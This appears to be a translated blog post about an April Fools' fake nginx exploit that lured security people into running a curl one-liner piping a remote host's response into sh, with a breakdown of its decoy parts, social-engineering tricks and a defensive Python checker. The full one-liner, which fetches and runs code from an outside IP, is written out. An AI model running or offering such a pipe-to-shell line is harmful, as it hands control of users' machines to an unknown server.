Translator's note:
TL;DR: Under no circumstances pipe a file into sh or bash. It is a great way to lose control of your computer.
I would like to share a short story about a proof-of-concept exploit created on March 31. It appeared there in keeping with that well-known holiday.
After finishing work on a new obfuscation technique for curl, I quoted the original tweet and "leaked" a working PoC: a single line of code that supposedly exploited the discovered vulnerability. Of course, it was complete nonsense. I expected to be exposed right away and to collect, at most, a few retweets (again).
But I could not have imagined what happened next. The popularity of my tweet skyrocketed. Surprisingly, at the time of writing (15:00 Moscow time on the 1st) hardly anyone has noticed that it is a fake. Many people retweet it without checking at all (to say nothing of admiring the beautiful ASCII art it prints).
Just look at how beautiful it is!
All those curves and colours are wonderful, but it is obvious that displaying them requires running code on the machine. Fortunately, given that a browser behaves the same way and that I did not want to get into legal trouble, the code embedded on the site did nothing but make an echo call, without installing or executing anything further.
A small digression:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Social electronic engineering (SEE): not just phishing
Safety and familiarity played a key part in this experiment, and I believe that is what made it succeed. The command line visibly signals safety by referring to "127.0.0.1" (the well-known localhost). Localhost is considered safe: its data never leaves the computer.
Accuracy was the next key SEE element of the experiment. Since the target audience consisted mainly of people versed in the basics of computer security, it was important to write the code so that its parts looked familiar (and therefore safe). Reusing elements of old exploit concepts and combining them in new ways proved very effective.
Below is a detailed breakdown of the one-liner. Everything in this list is purely cosmetic; practically none of it is needed for it actually to work.
What components are really needed? Only -gsS, -O 0x0238f06a, |sh, and the web server itself. The web server contained no malicious instructions; it simply served the ASCII art with an echo command in a script inside index.html. When a user entered the line with |sh in the middle, index.html was downloaded and executed. Fortunately, the web server's administrator had no malicious intent.
- ../../../%00 - signifies directory traversal.
- ngx_stream_module.so - the path to a random NGINX module.
- /bin/sh%00<'protocol:TCP' - supposedly launches /bin/sh on the target machine and redirects its output into a TCP channel.
- -O 0x0238f06a#PLToffset - the secret ingredient: the suffix #PLToffset looks like some kind of memory offset inside the PLT.
- |sh; - another key ingredient. To run the code from the attacking web server at 0x0238f06a (2.56.240.x), the output had to be redirected into sh/bash.
- nc /dev/tcp/localhost - a reference to netcat and a dummy /dev/tcp/localhost, so that everything looks safe once again. In reality this part does nothing; it is in the line purely for beauty.
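As an added example (my own code, not the post's or its author's), here is a small Python checker run over the fake one-liner quoted above. It shows the two things a reviewer should establish before pasting such a line into a terminal: whether downloaded bytes are piped straight into a shell, and which hosts the command would really contact, decoding curl-style integer hosts such as 0x0238f06a into dotted-quad form (the #fragment, like #PLToffset, is discarded, as curl itself does). The regexes and function names are assumptions of this example.

```python
import ipaddress
import re

# The fake PoC quoted in the post, embedded verbatim as sample input.
ONE_LINER = (
    "curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler"
    "?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP'"
    " -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost"
)

# "| sh", "|bash", "| sudo sh" ...: downloaded bytes go straight into a shell.
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")
# A bare hex or decimal integer standing on its own as a host ("0x0238f06a",
# "2130706433"); curl accepts these and resolves them as IPv4 addresses.
NUMERIC_HOST = re.compile(r"(?<![\w./:-])(0x[0-9a-fA-F]+|\d{5,})(?=[#/:\s]|$)")
URL_HOST = re.compile(r"https?://([^/\s:'\"<>]+)")


def decode_numeric_host(token: str) -> str:
    """Convert a curl-style integer host to dotted-quad notation.

    The fragment ("#PLToffset") is dropped first: curl never sends it, so it is
    decoration, not a memory offset.
    """
    host = token.split("#", 1)[0]
    value = int(host, 16) if host.lower().startswith("0x") else int(host, 10)
    return str(ipaddress.IPv4Address(value))


def normalise_host(host: str) -> str:
    """Decode integer hosts found inside URLs; leave names and dotted quads alone."""
    bare = host.split("#", 1)[0]
    if re.fullmatch(r"0x[0-9a-fA-F]+|\d+", bare):
        return decode_numeric_host(bare)
    return host


def analyze(cmd: str) -> dict:
    """Summarise what a pasted one-liner would really do before anyone runs it."""
    hosts = [normalise_host(h) for h in URL_HOST.findall(cmd)]
    hosts += [decode_numeric_host(m) for m in NUMERIC_HOST.findall(cmd)]
    return {
        "pipes_to_shell": bool(PIPE_TO_SHELL.search(cmd)),
        "hosts": hosts,
        # A visible 127.0.0.1 or localhost says nothing about where the data comes from.
        "mentions_localhost": "127.0.0.1" in cmd or "localhost" in cmd,
    }


if __name__ == "__main__":
    report = analyze(ONE_LINER)
    print("pipes into a shell:", report["pipes_to_shell"])
    print("hosts contacted   :", ", ".join(report["hosts"]))
    print("localhost decoy   :", report["mentions_localhost"])
```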
That concludes the decoding of the one-liner and the discussion of its "social electronic engineering" (sophisticated phishing) side.
Web server configuration and countermeasures
Since the majority of my followers are infosec people and hackers, I had to think about what they might do (and configure the server accordingly). The experiment is still ongoing, so I am not going to analyze every pitfall here, but here are some of the things the server does:
- Actively monitors attempts to share it on certain social networks and substitutes various preview thumbnails to entice users to click the link.
- For Chrome/Mozilla/Safari and similar browsers, redirects to a Thugcrowd promotional video instead of showing the shell script.
- Monitors for obvious signs of intrusion or blatant hacking and starts redirecting such requests to NSA servers (ha!).
- Installs a trojan and a BIOS rootkit on every computer whose user visited the host from a regular browser (just kidding!).
A bit from under the hood
In this case, my only goal was to master some of Apache's features, in particular its excellent rules for redirecting requests. And I reasoned as follows:
NGINX exploit (the real one!)
Source: habr.com